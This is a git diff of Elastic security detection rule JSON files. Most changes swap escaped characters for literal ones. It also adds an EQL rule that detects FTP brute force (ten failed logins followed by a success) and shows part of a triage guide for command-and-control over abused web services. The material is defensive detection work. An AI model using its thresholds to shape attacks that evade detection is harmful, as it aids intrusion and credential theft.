a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_102.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_102.json index 21d2a5d6c80..1c6a32ed6fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_102.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_103.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_103.json index f003dfd6ff6..d8214bc7e19 100644 --- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_103.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_104.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_104.json index 1bd98a1487f..fa22d26abe4 100644 --- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_104.json +++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_104.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_105.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_105.json index 900909261bb..b1c20197397 100644 --- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_105.json +++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_105.json @@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_106.json b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_106.json index 9572bdcc34a..d0731738015 100644 --- a/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_106.json +++ b/packages/security_detection_engine/kibana/security_rule/661545b4-1a90-4f45-85ce-2ebd7c6a15d0_106.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_1.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_1.json index 1095c196262..52e42a9e08f 100644 --- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_1.json +++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_2.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_2.json index 10afe8ef6b4..a75cb6ae330 100644 --- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_2.json +++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_3.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_3.json index 580cf8b5350..df005687dec 100644 --- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_3.json +++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_3.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_4.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_4.json index f3122b5c263..5eb7387cd43 100644 --- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_4.json +++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_4.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_5.json b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_5.json index 6ab86becddb..1032b032943 100644 --- a/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_5.json +++ b/packages/security_detection_engine/kibana/security_rule/6641a5af-fb7e-487a-adc4-9e6503365318_5.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_101.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_101.json index e1d2ea38c9f..52754b891fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_101.json +++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_101.json @@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_102.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_102.json index 6d28fa9ced1..c29cdd1534b 100644 --- a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_102.json +++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_102.json @@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_103.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_103.json index 007d8c9f5fb..2949ba48fb7 100644 --- a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_103.json +++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_103.json @@ -40,7 +40,7 @@ ], "risk_score": 47, "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_104.json b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_104.json index 53e6b66082a..dff3dd4ac65 100644 --- a/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_104.json +++ b/packages/security_detection_engine/kibana/security_rule/665e7a4f-c58e-4fc6-bc83-87a7572670ac_104.json @@ -39,7 +39,7 @@ ], "risk_score": 47, "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_1.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_1.json index 6cda25778c1..02de4662ef2 100644 --- a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_1.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Successful Linux FTP Brute Force Attack Detected", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "sequence by host.id, auditd.data.addr, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and \n auditd.data.addr != null and auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and \n auditd.data.addr != null and auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_2.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_2.json index 4b53ff1b9b5..0e02c932945 100644 --- a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_2.json +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_2.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_3.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_3.json index 427f5c8cf22..7cf0d5f95ad 100644 --- a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_3.json +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_3.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_4.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_4.json index 4465d813553..ccf41e457e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_4.json +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_4.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_5.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_5.json new file mode 100644 index 00000000000..ad5b51c0050 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_5.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux FTP Brute Force Attack Detected", + "query": "sequence by host.id, auditd.data.addr, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and \n auditd.data.addr != null and auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and \n auditd.data.addr != null and auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n", + "related_integrations": [ + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.addr", + "type": "keyword" + }, + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_104.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_104.json index 5bdc882061c..fc2fe74bc4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_104.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_104.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further 